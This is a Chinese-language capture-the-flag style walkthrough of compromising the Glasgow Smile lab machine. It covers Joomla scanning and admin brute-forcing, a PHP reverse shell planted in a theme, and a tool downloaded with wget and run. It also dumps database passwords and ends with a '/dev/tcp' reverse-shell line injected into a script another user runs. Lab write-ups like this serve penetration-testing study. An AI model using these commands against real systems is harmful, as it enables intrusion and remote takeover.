首先对目标地址进行端口扫描
访问80界面
来看看插件的内容
以及dirb目录扫描的结果,这里发现了一个joomla的cms内容管理系统
我们使用joomscan进行目录扫描
joomscan --url http://10.10.10.129/joomla
版本指纹为 Joomla 3.7.3rc1
尝试一顿操作后,都登录不进去,找exp也没有,那么就来爆破后台地址
http://10.10.10.129/joomla/administrator
普通密码字典爆破失败后我又试着将index.php中的信息用cewl做成字典进行尝试
cewl http://10.10.10.129/joomla > dict1.txt
继续打开burp抓包,尝试admin进行爆破
添加字典
没有结果
这里要使用这个默认的用户joomla此时的密码就爆破成功了
来到后台的管理
我们找到已启动的主题这里修改配置文件,为反弹shell的php(kali自带的)
之后访问主页就能反弹成功了
我们使用FeatherScan
wget 10.10.10.128:8000/FeatherScan
chmod +x FeatherScan
./FeatherScan
检查敏感文件/etc/passwd、/etc/shadow都不可写,以及sudo命令都不可以使用
通过FeatherScan linux内网扫描工具扫描出来可能存在脏牛提权漏洞
尝试一下是失败的,看样子是已经修复了的
切换思路,我们来到cms的配置文件
可以看到密码就是Gotham(刚刚爆破出来的结果)
mysql -ujoomla -pbabyjoker
use joomla_db
use mysql
select User,Password from user;
找到了root的解密结果为babyjoker
切换任意一个用户试试
看样子都没有效果,我们换一个数据库看看
use batjoke
select * from taskforce;
很好找到了这些密码,全部记下来并解密(base64)
Bane:baneishere
Aaron:aaronishere
Carnage:carnageishere
buster:busterishereff
rob:???AllIHaveAreNegativeThoughts???
aunt:auntis the fuck here
发现rob用户存在,切换用户成功
找到第一个flag
这里有一个abner用户的求救文件,看样子是一个加密文件,那么是什么加密呢,从一封信的角度来看,对内容做隐藏让我想到了
https://btsrk.me/ ,打开这个站点,我们对这个结果进行解密
翻译结果如下
简单来说就是让我们解密这段base64加密的结果
STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==
┌──(root㉿kali)-[/data/demo]
└─# echo "STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==" | base64 -d
I33hope99my0death000makes44more8cents00than0my0life0
解密成功后就切换到这个用户
找到第二个flag,又有一个提示信息,但是没什么用
前面信息收集都搜集的差不多了(FeatherScan),直到我查看到了他的历史命令包含了这样一个东西
找到这个文件的位置,还要我们输入密码
find / -name .dear_penguins.zip 2>/dev/null
下载下来尝试爆破,用kali自带的字典
一顿操作没有结果后,我使用了当前用户的密码进行猜测,就成功了
abner@glasgowsmile:/var/www/joomla2/administrator/manifests/files$ unzip .dear_penguins.zip -d /tmp
<r/manifests/files$ unzip .dear_penguins.zip -d /tmp
Archive: .dear_penguins.zip
[.dear_penguins.zip] dear_penguins password: I33hope99my0death000makes44more8cents00than0my0life0
inflating: /tmp/dear_penguins
abner@glasgowsmile:/$ cd /tmp
cd tmp
abner@glasgowsmile:/tmp$ ls
ls
dear_penguins
abner@glasgowsmile:/tmp$ cat dear_penguins
cat dear_penguins
My dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!
scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
就又看到一段密文scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz,再次切换用户试试
在penguin用户中看到了一个find命令,且具有suid权限,很多人可能会想到find提权,但是这里可不是,下面看描述
1、s(setuid 位):表示该文件在执行时,会以 文件所有者(penguin)的权限 运行,而不是执行者的权限。
2、这里的所有者是 penguin,所以 find 运行时会有 penguin 的权限(不是 root)。
我们来看下面这个文件,也是一个可执行文件,查看内容竟然是一个可执行sh脚本
开始修改
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo '#/bin/sh'
#/bin/sh
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo '#!/bin/bash' > .trash_old
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo '/bin/sh -i >& /dev/tcp/10.10.10.130/1234 0>&1' >> .trash_old
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old
#!/bin/bash
/bin/sh -i >& /dev/tcp/10.10.10.130/1234 0>&1
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ./.trash_old
到此提权成功
往期推荐
不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学
ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略
【oscp】vulnerable_docker,三种代理方法打入内网
【内网渗透】CobaltStrike与MSF联动互相上线的方式
本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
暂无评论内容